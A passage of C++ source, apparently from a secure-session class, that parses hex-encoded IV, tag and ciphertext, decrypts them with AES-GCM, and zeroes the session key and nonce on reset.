sscanf(iv_hex.substr(i * 2, 2).c_str(), "%2hhx", &encrypted.iv[i]); 350 | } 351 | 352 | // Parse tag (should be 16 bytes = 32 hex chars) 353 | encrypted.tag.resize(tag_hex.length() / 2); 354 | for (size_t i = 0; i < encrypted.tag.size(); i++) { 355 | sscanf(tag_hex.substr(i * 2, 2).c_str(), "%2hhx", &encrypted.tag[i]); 356 | } 357 | 358 | // Parse ciphertext 359 | encrypted.ciphertext.resize(ciphertext_hex.length() / 2); 360 | for (size_t i = 0; i < encrypted.ciphertext.size(); i++) { 361 | sscanf(ciphertext_hex.substr(i * 2, 2).c_str(), "%2hhx", &encrypted.ciphertext[i]); 362 | } 363 | 364 | // Decrypt 365 | std::vector decrypted(encrypted.ciphertext.size()); 366 | size_t decrypted_len = 0; 367 | 368 | if (!AES_GCM::decrypt(session_key, encrypted, 369 | decrypted.data(), decrypted_len)) { 370 | #ifdef DEBUG_MODE 371 | DEBUG_LOG_CAT("DECRYPT", "AES-GCM decryption failed"); 372 | #endif 373 | return false; 374 | } 375 | 376 | plaintext.assign((char*)decrypted.data(), decrypted_len); 377 | return true; 378 | } 379 | 380 | bool is_authenticated() const { return authenticated; } 381 | 382 | void reset() { 383 | SecureMemory::zero(session_key, sizeof(session_key)); 384 | SecureMemory::zero(session_nonce, sizeof(session_nonce)); 385 | authenticated = false; 386 | } 387 | }; 388 | 389 | } // namespace crypto 390 | --------------------------------------------------------------------------------